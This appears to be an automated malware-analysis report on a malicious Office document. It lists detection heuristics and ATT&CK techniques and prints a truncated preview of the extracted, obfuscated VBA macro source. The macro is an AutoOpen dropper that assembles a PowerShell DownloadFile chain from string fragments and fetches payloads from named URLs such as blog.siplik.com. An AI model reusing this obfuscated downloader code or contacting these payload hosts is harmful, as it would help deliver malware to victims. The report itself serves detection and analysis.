Verdict: MALICIOUS (risk score: 302)
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro uses the Shell() function to execute a downloaded payload from the reconstructed URL "http://blog.siplik.com/vTW5jY/pXIAhVNF". The presence of the Shell() call and the embedded URL strongly indicate downloader or dropper functionality.
Heuristics (7)

- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 74317 bytes | 82de7429ce70a6f9cfbbc822bce8bfbcdf8829b69e6a6dee877e2a0059d062e0 | ClamAV: Doc.Trojan.Obfuscated-6443078-0 | unlikely |
Preview script: first 1,000 lines of the extracted script (obfuscated macro source as recovered by olevba; shown as evidence, not as runnable code)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AqkATsDs"
Function GFUXzrWdafKF()
On Error Resume Next
whlMibJQ = 44224474 / IjNoqdzbWAN - 536083786 + CSng(lwpsDRNawui) + 2 - Chr(7013) - qzScOXP / 8527 * VboGMuXkaGoI + Fix(7798) + 9905 * Sin(7) / 310 * Sin(BpimrYmr)
hzdGUvi = 44224474 / cIjdYPPdFBOkh - 536083786 + CSng(KNXnHQdCZVUDn) + 2 - Chr(7013) - viRmjbAhEoaSZ / 8527 * DzzTqMEwpZiOOZ + Fix(7798) + 9905 * Sin(7) / 310 * Sin(KJUcahbjcDFq)
luihUl = Mid("Gw1fkwI0Y9YqQLmvzvltftUuFBXGa+JIq= JIq+JIqzJIq+JIqTJIq+JTmi+TmiIq3ns'+'J2jdMm", 30, 43)
ndLfBF = 44224474 / iOEHwrKWN - 536083786 + CSng(kbEJKijJucArFW) + 2 - Chr(7013) - oKjqXwdtFzZBEw / 8527 * ZDtpYjwfXDK + Fix(7798) + 9905 * Sin(7) / 310 * Sin(rPPmIiJJh)
vizVdtJtPb = 44224474 / UDICVNjaQ - 536083786 + CSng(awcfTuM) + 2 - Chr(7013) - QcjJSYVYiDW / 8527 * kdXWzupPRICbMI + Fix(7798) + 9905 * Sin(7) / 310 * Sin(sPFXWpocBkLlj)
XzljljTvpJT = 44224474 / jqAGizMlhbN - 536083786 + CSng(CzwQzRsfM) + 2 - Chr(7013) - MjmiqKQTvmww / 8527 * CoRwzSmWjC + Fix(7798) + 9905 * Sin(7) / 310 * Sin(MRorkrQCOti)
IIuYBIs = Mid("K5Ha7E5ZUKdd3NFl84GwVD8q+'+'JIqhtJIq+JIqtpsJ'+'Tmi+TmiIq+JIq://JIq+JIqblogJIq+JIq.siplikJITmi+Tmiq+JIq.com/vTW'+'5JI'+'q+JIqjYJIq+JIq/pXIAhVNF", 24, 112)
oiIVGzSY = 44224474 / wfcEUTzYFiZF - 536083786 + CSng(IIaFwJhdJdfzFv) + 2 - Chr(7013) - VmmJFiU / 8527 * ZXsotTJXwQs + Fix(7798) + 9905 * Sin(7) / 310 * Sin(UbfObCDnCzE)
AOkYLrt = 44224474 / NYhziHEX - 536083786 + CSng(bErsJiwSi) + 2 - Chr(7013) - rTIMcomsiM / 8527 * bHiIcCBSwkjDjj + Fix(7798) + 9905 * Sin(7) / 310 * Sin(WAiRRDT)
PZtPnKs = 44224474 / YzCTvPAOo - 536083786 + CSng(AhEVnJzFhiM) + 2 - Chr(7013) - fuGXiCfha / 8527 * SdQwRqbiQir + Fix(7798) + 9905 * Sin(7) / 310 * Sin(bwKFOtowPVBIR)
PjArj = Mid("iRuUftVZHKo][Tmi+cnvajP6zrBU9aZdW9DkqcRZK2O3", 12, 6)
OVzTIKj = 44224474 / apFLEJwOaKRA - 536083786 + CSng(NjjbwzmnHPYdbR) + 2 - Chr(7013) - NMvtHWETXqzI / 8527 * VJsSjEJQwpUDhw + Fix(7798) + 9905 * Sin(7) / 310 * Sin(ZjidsLANP)
FTsnc = 44224474 / azwCuLDsIUZ - 536083786 + CSng(GdivQrQUN) + 2 - Chr(7013) - zkEpMXicdXd / 8527 * lziSIOkObWLZh + Fix(7798) + 9905 * Sin(7) / 310 * Sin(oEGiBHS)
hnuvUjCIT = 44224474 / saIQIkzrmS - 536083786 + CSng(XGuWIUPWbpZalt) + 2 - Chr(7013) - ITQoVvduqiAAp / 8527 * UMviUCa + Fix(7798) + 9905 * Sin(7) / 310 * Sin(GkqkrnhSzXWSc)
CnvPEptjQ = Mid("ScBEpnCh8q+JIqc in zT3bcd){JIq+JIqt'+'ry{Tmi+'+'TmiJIq+JIqzT3francJIq+JIq.D'+'JIq+JIqownloJIq+JIqadFile'+'(zT'+'3abc.ToStrinJIqiL3pXSUfGlA9", 10, 118)
OrUhj = 44224474 / AMzEzfOfqCoRsh - 536083786 + CSng(zjBkzEaZ) + 2 - Chr(7013) - HIjZWwVVWqz / 8527 * VDPEzwjIlQ + Fix(7798) + 9905 * Sin(7) / 310 * Sin(HrIvAXTq)
vqSQTXvBUMO = 44224474 / oKUsAMHYZMYoTF - 536083786 + CSng(cVkEjjoHHhRrN) + 2 - Chr(7013) - AdnDtARzcKK / 8527 * IpBSfPahvkKPa + Fix(7798) + 9905 * Sin(7) / 310 * Sin(zDMKjUusZ)
LQVZTcVmrL = 44224474 / mSzqwoIrjS - 536083786 + CSng(BjqcjlfzHuQuqv) + 2 - Chr(7013) - hNDVwCAXjDG / 8527 * HKoocSVLXA + Fix(7798) + 9905 * Sin(7) / 310 * Sin(POrUifWXGvUH)
HwSzLzJw = Mid("IMzvBTMzY9zAmWu0zWldqn3TVLzItq80+['+'CHAr]73),[CHA'+'r]1'+'24 -cREpLACE ([CHAr]115+[CHAr]105+[CHAr]49'+'),[CHAr]36)) ').REPLace('Tmi',[STriNG][cHAR]39).REPLace('Pt2',[STriNG][cHAR]36) ) Iz5", 31, 156)
fLKid = 44224474 / kkZEXisaunYz - 536083786 + CSng(oBBRfjP) + 2 - Chr(7013) - XdiANkSbqw / 8527 * PTivpVKRs + Fix(7798) + 9905 * Sin(7) / 310 * Sin(VmpAwYIhDPJK)
rXPirCWKR = 44224474 / DujQFQG - 536083786 + CSng(fikSQiV) + 2 - Chr(7013) - EzktIjDuHXjpO / 8527 * YKXoNFrBj + Fix(7798) + 9905 * Sin(7) / 310 * Sin(rdldhjF)
sDbajvOOn = 44224474 / MHvEJtawD - 536083786 + CSng(JkmGGLvVRWjCq) + 2 - Chr(7013) - APMJtnjGEEVnu / 8527 * AYSlRzjQM + Fix(7798) + 9905 * Sin(7) / 310 * Sin(CWHtrnfKQ)
QaKhYE = Mid("FaLGq+JIq/,htJIq+Tmi+TmiJIT'+'mi+TmiqtJIq+JIqp:JIq+JIq//charlesdundaJI'+'q+JIqs.co.8J7nXjiHU58MIilakj1
```

... (truncated)